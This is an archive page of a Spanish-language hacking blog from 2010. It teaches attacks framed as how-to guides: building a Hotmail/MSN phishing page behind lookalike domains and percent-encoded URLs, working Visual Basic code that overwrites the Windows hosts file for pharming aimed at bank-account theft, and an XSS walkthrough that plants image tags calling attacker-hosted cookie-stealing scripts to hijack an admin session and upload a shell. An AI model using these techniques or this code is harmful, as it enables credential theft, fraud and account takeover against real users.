BackUp SeguridadBlanca

Backup Oficial de SeguridadBlanca.Org

lunes, 11 de enero de 2010

Análisis - Phishing de MSN


Hoy quiero tratar de dar unas pautas del motivo por el cual es tan fácil engañar gente para que nos de su clave de msn con phishing...


En primera, vamos a hacer la comparación con como se ve facebook un login...


facebook:

http://www.facebook.com/login.php


Hotmail:

http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1263246246&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=3082&id=64855&mkt=es-es


Análisis de los login... el de Hotmail pues como nos damos cuenta está en un subdominio, nos da variables cualquieras, tiene una especie de variable que llama al sitio http://mail.live.com/default.aspx o convoca por algún motivo o algo.


Gracias a Esto podríamos usar una técnica conocida como URL OBFUSCATION, ahora les voy a dar un ejemplo de como podriamos hacer eso

digamos que nos compramos el dominio liives.com o compramos loginlive-account.com algo por el estilo ahora vamos a ponerle un sub-dominio a nuestro dominio comprado


http://msn.loginlive-account.com

ahora subimos nuestro SCAM

http://msn.loginlive-account.com/windows/msn/messenger/connect/index.php

OFUSCADA:

http%3A%2F%2Fmsn%2Eloginlive%2Daccount%2Ecom%2Fwindows%2Fmsn%2Fmessenger%2Fconnect%2Findex%2Ephp

Otra opción:

http://0/wind%6fw%73/ms%6e/mes%73eng%65r/%63o%6ene%63t/i%6e%64ex.%70%68%70


Como ofuscamos:

http://www.keyone.co.uk/tools-url-encoder.asp

o sino:

http://funkyfilters.com/url/obfuscation/


Eso en cuestion al Login...


Ahora las actualizaciones de imagenes, por ejemplo yo siempre ando probando las nuevas cosas que me entero que salen entonces por ahí, en mi msn tengo mucha gente y por ahí escucho nuevo SCAM de Facebook entonces yo digo mm ¿nuevo? lo que pasa es que Facebook en muchas ocaciones cambia el lugar donde hostea sus imágenes, lo hacia mas seguido antes pero ahora no tanto, esto es como una medida de seguridad...


Otro aspecto que hace tan vulnerable a hotmail son las páginas del tipo www.quienteadmite.com en esta página se supone que se da el servicio de ver quien te tiene bloqueado, la gente no conocedora del tema se logguea y ve quienes le han dado a no admitir y pues gracias a esto muchos tienen sus messengers pero otros también entran.

este ha sido un pequeño análisis de por que es tan común robar cuentas de msn...


Saludos
Dr.White
Publicado por en 1 comentario:
Etiquetas: , ,

sábado, 9 de enero de 2010

El Hacker (Amante de la Seguridad Informática) Élite Perú

Perverths0 el Dueño de CuscoSoft ha decidido realizar un concurso para que la gente vote y decida quien es el mas amante de la seguridad informática en perú, ya estoy propuesto como candidato y me gustaría mucho ganar, no para la fama sino para saber realmente si hay gente que me considera, espero ustedes voten por mio, la competencia estoy seguro será fuerte, pero no me rendiré, se trata de competir no te ganar pero si gano no me quejo.


Espero contar con su voto, solo deben votar por mi en cuscosoft también si lo desean pueden proponer sus candidatos para que ganen, aún no se si habrá mas premio que el nombramiento pero para mi eso sería suficiente...


Espero Voten Por Mí...


Visiten Cuscosoft es muy buena página

Saludos
Dr.white
Publicado por en 7 comentarios:
Etiquetas:

viernes, 8 de enero de 2010

Hosts Poisoning T00l

Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...


Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en Professional Hacker han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...


Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, aquí podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.


el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...


El Code:


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''' HOSTS POISONING MODULE BY XA0S '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Creado por Xa0s '
' www.professional-hacker.org '
' Modulo encargado de editar el archivo Hosts de Windows '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function hosts(insertar As String, windows As String) As String
Dim w2 As String
If windows = 95 Then
w2 = "C:\Windows\hosts"
Else
If windows = 98 Then
w2 = "C:\Windows\hosts"
Else
If windows = "Me" Then
w2 = "C:\Windows\hosts"
Else
If windows = "NT" Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = 2000 Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = "XP" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = 2003 Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "Vista" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "7" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"
Exit Function
End If
End If
End If
End If
End If
End If
End If
End If
End If
Open w2 For Output As #1
Print #1, "// Hosts Poisoning Module By Xa0s //"
Print #1, insertar
Close #1
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' El sistema operativo puede ser: '
'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7 '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''


en el mismo código se especifica mucho...


espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.


PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.

Saludos
Dr.White
Publicado por en No hay comentarios:
Etiquetas: , ,

domingo, 3 de enero de 2010

Procedimiento, Cuando un Xss se vuelve crítico.

Empezando este año con una entrada que creo que les ayudará a ver desde otra perspectiva un xss, en esta ocación les voy a enseñar como explotar un Xss para poder entrar...


Hace un tiempo escribí sobre como se hace para robar cookies con un xss y para los que se orientan con mi blog pues han de creer que yo enseñe robando masomenos con ingeniería social pero nosotros podemos hacer mas que eso... ahora les mostraré lo que podemos hacer...


mm el código que usaremos es el stándar por asi decirlo que tenemos en la otra entrada pero lo vamos a complementar con otras cosas... ahora si, hay muchas maneras de como poder entrar como administrador a una web con un xss o xsrf y la primera es robandole la cookie al administrador o moderador con ingeniería social + un Foro Vulnerable...


Asi como hago yo ustedes cuando quieran ver si una app es vulnerable procuren descargarlo y buscar código con errores, en casi todas las entradas pongo ejemplos de como se ve un código con error, o si quieren busquen el bug en exploit-db y ver si existe un xss o csrf a explotar... ahora si a la acción...


Tenemos nuestro Bug un Perfecto Xss para robar cookies está ubicado en el en el bbcode [img][/img] el problema con esto es que podemos poner cualquier tipo de imagen es decir jpg jpeg gif pero... php? mmm como podemos ver pregunté si se podía php, el php no es un tipo de imagen pero aun así los programadores cometieron ese error ahora a explotarlo, vamos a escribir una entrada, digamos en un foro de "hackers"...


Tema: Nuevo 0day :o
Content:

[img=http://miwebhostingparahackear.com/robocookie.php][/img]

Bueno amigos.................


EOF
------------------------


Listo como vemos acabamos de "ejecutar" nuestro código de robo de cookies y hemos comenzado a robar cookies y lógico lo que esté escrito en el post debe ser convincente luego vamos a ver quienes han caido... no puede ser... tenemos 20 sessiones que nervios... probemos a ver si alguna es del administrador, ahora despues de probar 13 sessiones:

Welcome Admin


Listo ya teniendo la administración podemos subir una shell como theme, etc pero bueno ahora les voy a mostrar otra situación... hace unos días un amigo me comentó de un 0day muy curioso... era en un chat php...


despues de analizar durante mucho rato el chat por que el no me quería decir del bug se me ocurrió ver los headers usando nuestro live http headers, y en el chat dijeron algo chistoso y yo use el emoticon "xD" y en eso vi que en uno de los headers post de los mensajes se veia algo como esto...



<img src="http://www.webserver.com/chat/files/emoticon10.jpg></img>


cuando lo vi dije no puede ser no creo que ese sea el bug...

cambie


<img src="http://www.webserver.com/chat/files/emoticon10.jpg></img>

por

test123...

y posteo eso intento lo primero con una redirección pero no aceptaba todos los tags entonces probe poner:



<img src="http://www.miwebhackeatodo.com/robo.php></img>


salio una [x] en ves de imagen y mientras escribian en el chat yo me iva sacando todas las cookies... como se dan cuenta hay veces que los errores son pura investigación y curiosidad... lo único que hice fue probar un poco y salio, ustedes también pueden hacer esto...


yo hoy les he enseñando esto con la etiqueta img pero se puede con un iframe, hipervínculo de flash y todo lo que ustedes se imaginen...


espero les sirva este tuto...


Saludos
Dr.White
Publicado por en No hay comentarios:
Etiquetas: , , , , , ,
Suscribirse a: Entradas (Atom)